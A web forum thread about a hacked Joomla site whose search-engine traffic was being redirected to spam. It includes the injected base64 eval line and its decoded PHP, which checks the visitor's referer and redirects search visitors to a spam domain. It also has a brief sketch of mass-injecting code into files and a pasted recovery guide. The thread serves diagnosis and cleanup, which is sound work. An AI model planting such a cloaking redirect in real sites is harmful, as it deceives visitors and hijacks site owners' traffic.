Search engine to SPAM redirect error

I wasted my whole weekend over it :smack: . . . but I finally been able to fix it .

So let me tell you want was happening . I am maintaining a website and if you search that website in Google it comes on the top . But issue was that when you click on the link instead of redirecting it to the original site it was redirecting it to some spam site . But if you enter the direct URL in browser it was working fine . Via firebug I been able to detect that it is redirecting it but I couldn’t figure out whats causing it .

Anyways , after wasting too much time I noticed a single line on top of every page which I thought wasn’t there before

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokbmNjdj1oZWFkZXJzX3NlbnQoKTsN
CmlmICghJG5jY3Ypew0KJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOw0KJHVhPSRfU0VSVkVS
WydIVFRQX1VTRVJfQUdFTlQnXTsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIo="));

This freaken damn line . Ok now let me show you its decoded form

error_reporting(0);
$nccv=headers_sent();
if (!$nccv){
$referer=$_SERVER'HTTP_REFERER'];
$ua=$_SERVER'HTTP_USER_AGENT'];
if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing")
 or stristr($referer,"yandex.ru") or stristr($referer,"rambler.ru") or stristr($referer,"mail.ru") or 
stristr($referer,"ask.com") or stristr($referer,"msn") or stristr($referer,"live")) {
    if (!stristr($referer,"cache") or !stristr($referer,"inurl")){        
        header("Location: http://www.fdvrerefrr.ezua.com/");
        exit();
    }
}
}

See how these damn hackers write intelligent scripts to add this line in your code . :grumpy:

Anyways , I just removed the first line from all the files and now its working fine . I also fixed the write permission of all the files and now I am planning to upgrade the version of the site to patch these security holes .

I hope it will help someone in the same situation as I was:)

Re: Search engine to SPAM redirect error

thanks for sharing .
Here is some more information I found for someone.

OK , so here is the long answer:
What do you do when your Google listings turn into Viagra spam? It’s a Webmaster’s or IT Manager’s worst nightmare come true.
ou wake up to your phone ringing off the hook. Your client or company yelling at you to “Get the Viagra ads off the website!”

Overnight your site got hacked. The description in your Google listings now say you are selling “Viagra from a Licensed Canadian Pharmacist”.
This hack only effects your search engine listings – not the website. Anyone looking at your Google listings can see you’ve obviously been hacked and don’t want to click on a Viagra ad – paralyzing Internet communication.
Google Conditional Hack” is the latest hack hitting websites hard.

What makes this hack unusually insidious is that although everyone can see the Viagra spam in the site’s Google listings – everyone can see it except the Webmaster or IT Department whose job it is to fix it because this hack simply cannot be seen by humans without special tools and humans can’t fix what they can’t see!

The word “Viagra” may not even appear anywhere in the source code of the hacked site humans can see. The hacked coding can only be seen through the eyes of the GoogleBot, Google’s robot spider that crawls your site to rank and index it.
The only place you can see the result of the hack through the GoogleBot’s eyes is in Google Webmaster Tools. Establishing an account is a relatively simple procedure taking less than five minutes by copying and pasting code Google supplies onto your website. Google: Google Webmaster Tools

Go to the bottom of the main menu and click “Labs” then select “Fetch as Googlebot” – a recent addition to Google’s website to help webmasters combat this problem. This is the only place you can see through the GoogleBot’s eyes to make the hacked code visible for humans to remove it.
[size=2]But unless the Webmaster or IT Manager knows this trick… Good Luck!
They can look forever for the hacked Viagra spam coding and will never ever find it – the whole time everyone yelling at them to “Get the Viagra ads off the site!”
Five steps you must take when your Google listings turn into Viagra spam with a Google Conditional Hack

Speed of recovery is key as the loss of anyone’s website is an emergency. Knowing the steps to recover from this hack and the time involved to execute each step is crucial to keep your website’s downtime to a minimum.
When this hack recently hit the website of the city government in the hill’s above Google’s Silicon Valley headquarters where many top Google executive’s live it paralyzed city government Internet communications for two weeks when the city’s Google listings turned into Viagra ads people don’t click on.
Google has added new features to Google’s Webmaster Tools to help Webmasters combat this problem that’s rising sharply. These include the “Fetch as GoogleBot” tool, the URL removal tool which is now reversible so you can remove and reinstate a URL that has been corrupted, and the “Cache Removal” tool for the homepage which is the most common page to be hacked.
Nathan Johns, Search Quality Analyst at Google says hacks are no fun. “Hacks vary in all shapes and sizes. Sometimes they cloak to Googlebot, sometimes they don’t.” But they all follow a basic theme. “Your site gets hacked, the hacker cloaks content to a search engine (in this case Google) and shows different content to the user, generally making money through affiliate ads or clicks. Many parts of this formula can be executed differently, but that’s the general idea.”
Unfortunately, it’s a sad fact of life most websites don’t discover their true vulnerability until after they’ve actually already been hacked. Then it’s a matter of fast recovery.
Be prepared to explain to nontechnical people “Well if this is a ‘Google Conditional Hack’ that only effects Google listings, is Google going to fix it?” No, the hack is on the site – not Google. It’s that only the GoogleBot can see the hacked Viagra spam coding.

Google provides invaluable tools and advice to help recover at Google Webmaster Tools and in the Google Webmaster Help Forums where you can get answers to tough questions within a couple hours. Google: Google Webmaster Help Forums

1. Quarantine Your Site and Secure the Host
This is the single most important and responsible first thing to do so no one else gets hurts. If hackers could change your site, they could also be changing information on your site –
or worse, installing malware on your visitors.
Google’s John Mueller says, “The easiest way to do this – while still allowing you to diagnose this issue – is to just point your DNS entry to a different server (which could show an “under maintenance” banner, for instance). If you need to provide some information, you could put a collection of FAQs on that banner page.” Keep them simple HTML pages.
Contact your web hoster. If hackers hit your site, they could potential hit others on the host. Change the passwords for all users and all accounts. Make sure the computer you do this on is hack free and not capturing new passwords.
Don’t be confused if Google Webmaster Tools reports “No Malware Detected” with this hack. Unless actual trojan horses or spyware are detected being downloaded, this hack will not normally trigger “Malware Detected” displayed under “Diagnostics” in Google Webmaster Tools.

2. Remove the Hacked Pages from Google’s Index
Under “Crawler Access” in Google Webmaster Tools, select “Remove URL.”
Before doing anything be sure to read the link on this page that reads “Removal Requirements.”
You will need to first make sure the page is no longer live on the web, returning either a 404 not found, or 401 status. You must also keep spiders off the page with either a robots.txt file or **** noindex.tag – coding Google will generate and provide you with the links on this same “Crawler Access” page.
ts very important to know this tool is now reversible, so when the site is cleaned up you can return the URL to Google’s index. As this is a relatively new feature in Google Webmaster Tools untested by most Webmasters – which formerly wouldn’t return the URL within three months – know you can click this with confidence and later bring the URL back within 24-36 hours.
John Mueller of Google assures, “I just wanted to confirm that using the URL removal tool generally does not have lasting, negative effects when you cancel a removal. It may take a day or so for things to come back, but apart from that it would be fine.”
After the site is no longer live and spiders can’t crawl it, click “New URL Removal Request” and complete the request on the “Crawler Access” page. This will get the hacked Viagra ad out of the public’s eye within 12-24 hours. Understand it will then take another 24-36 hours to get the cleaned URL back up on Google once this removal request is reversed.

3. Asses the Damage
One version of this hack that makes this extremely time consuming to asses the scope of the damage is you only have the small keyhole of the “Fetch as GoogleBot” tool to even be able to see the hacked coding. Then scripts appear to be activated upon viewing which cause it to morph onto other pages causing them to appear hacked at one time – then OK – then hacked with Viagra spam again.
“The hack is flighty, slippery, hard to pin down!” Says Google Webmaster Help Forum Webado after studying it closely. Read the postings and establish a dialog with Google there to help make sense out of an incredibly sophisticated hack that’s even hitting cyber security sites hard.

4. Clean up the Hack
Review your content, remove any suspicious code or pages that were added. Backups of your content is invaluable at this point in terms of speed of recovery. “Consider deleting your content entirely and replacing it with your last known good backup (once you’ve checked to make sure it’s clean and free of hacked content)” Google says.
Use the “Fetch as GoogleBot” tool to be certain the site is now clean.

5. Reverse the URL Removal Request
Go back to the “Remove URL” tab of Google Webmaster Tools and reverse the removal request to reinstate the listing in Google’s Index – which will normally take 24-36 hours.

Probably these Viagra spammers end up in one of those Buddhist Hell Realms where everyone’s genitals are too big or too small and they remain eternally unsatisfied. Meanwhile, the rest of us who have to deal with the consequences of their immaturity need to know how to recover quickly when a Google Conditional Hack turns your Google listings into Viagra spam no one clicks on – paralyzing Internet communication.

To read the entire thread of the Google Webmaster Help Forum on this incident of Google listings turning into Viagra spam:
Need Assistance with a Government Site - Google Webmaster Central Help

                                                                                                                                                                                                                         And one more:

Welcome to the Malware and Hacked Sites** section** of the Google Webmaster Help Forum.

Here you can find answers and ask questions about pages or websites …

• that appear to contain malicious content
• that have been labeled as containing malicious content
• that appear to have been hacked

Before you post your question about malware or hacking, please:

• **Read the FAQ: **
  https://sites.google.com/site/webmas…d-hacked-sites
• Check the Help Center:
  Webmaster Tools Help
• Search for previous topics and answers:
  Search results - Webmaster Tools Help

If you do post a topic/question, please be patient and wait at least a few hours for a reply (sometimes we do get a little busy here). Also make sure that you include all relevant information, such as the URL or URLs involved.

Keep in mind that posts in this forum are crawled, indexed and will be shown in search results. If you do not want your topic appearing in search results when people search for your website or business name, please use a URL shortening service such as cli.gs | shorturl service to mask your website’s URL.

If you have a question about Crawling, Indexing and Ranking, Webmaster Tools, verification in Webmaster Tools, or Sitemaps, please go to the appropriate section in this forum (see the sidebar for more details). For question regarding Google Maps, Chrome, Gmail or other Google products and services, please see the following list of specialized forums: Google Help Forums - Google Help

Any site-specific questions or off-topic posts will be deleted from this thread; please start a separate thread if you have a specific questions.

P.S. – You may be more likely to receive attention from expert forum members and Googlers if you sincerely note the secret phrase: “I have studied the Help Center, read the FAQs and searched for similar questions.”[/size]

Re: Search engine to SPAM redirect error

One of my colleague was telling me that its a wysiwyg expolite . So it won't be a bad idea to update wysiwyg editor too .

I heard GS has also been hit by this virus . I wonder what they are doing about it !!

Re: Search engine to SPAM redirect error

NaMaan: how come files on server were appended by malicious script? can anyone check update history on server?

Re: Search engine to SPAM redirect error

If you are using CMS like drupal, joomla or wordpress always double check the integrity of package before installing plugins and extensions. If i were you i would also check the permissions on the templates files/folder.

Re: Search engine to SPAM redirect error

Its very simple . You can write a simple script in which you can define couple of string comparisons , browse through the files , and keep on adding a PHP code on top of every file . Similarly, on every 'POST' you can append the same string at the end of query string and let it submit . Once site will try to show that text on PostBack or whenever and that PHP script will run and do its thing .

There can be many ways to achieve this kinda hack .

Re: Search engine to SPAM redirect error

I know yaar . Lesson well learn :D

Re: Search engine to SPAM redirect error

Girtay hain Shah Sawar hi Maidan-e-Jung main

In 2005 i was hired at a government dept. for one reason their website was being hacked every other hour, they restore database it hacked again .. and so it continues.
the site was based on ASP/MSSQL… the problem was with login area the so-called hackers automated system able to access the database with script exploit techniques. some idiot design the login/registration area without any validation against query-string and was using sql string concatenation queries.

i spent two weeks on that crap in the end it was two lines of code to fix the problem

Re: Search engine to SPAM redirect error

SQL injection is most easiest way to hack website. Therefore, I always support the idea of stored procedure instead of inline sql in data layer.

Re: Search engine to SPAM redirect error

^ the first lecture the teacher gave me in Advance ASP class.
it’s been few years i haven’t touch coding, but time well spent.

Restored attachments:

582701_411370425559464_242746142421894_1413157_1345812248_n.jpg800×600 84.3 KB

Re: Search engine to SPAM redirect error

I wish I could say that I like store procedures , but I HATE them . My only reasoning is that they are not flexible and might not be as efficient when you have huge data sets .

I am getting more inclined towards Data Access Objects i.e. JPA , Hibernate , Entity framework , ORM etc etc . The best thing about them is that you don't have to write SQL . You don't have to worry about opening/closing connections and all the labor work . They just persist data for you and you can control all the objects from inside your code .

Re: Search engine to SPAM redirect error

what CMS are you using Namaan ?

Re: Search engine to SPAM redirect error

BAD NEWS : ITS BACK

I think I’ll have to update Joomla version , there is no way out at least for now .

Re: Search engine to SPAM redirect error

Its Joomla .

Re: Search engine to SPAM redirect error

I noticed the same thing when I searched for GS in Google, it's happening even now. I search "Gupshup" in Google, the site paklinks.com is displayed with a spam title and when you click on it you are taken to an online pharmacy.

Re: Search engine to SPAM redirect error

tsk tsk or jao gandi sites pay

Re: Search engine to SPAM redirect error

So update is that I fixed the issue again , and this time , I made the infected files READ ONLY . Now if it will come back again , then it means something reallyyyyy fishy about it .

fingers crossed

Re: Search engine to SPAM redirect error

Hello! I am having a same problem you had. I tried to find “codes” to be removed. But, I could not figure out which files I should look at. It has been a while since you have posted, but I would really appreciate it if you could tell me the file names to check.

Thank you.

Re: Search engine to SPAM redirect error

You should look for recently modified files . For me it was index.php and includes/defines.php. I'll suggest not to delete the line, but just comment out the code .

Re: Search engine to SPAM redirect error

Thank you for your message, NaMaan. I solved the problem by telling your advice to the company I am using for my blog. It was a "wp-config.php" file for my case. Big relief!

Thank you very much.

Ken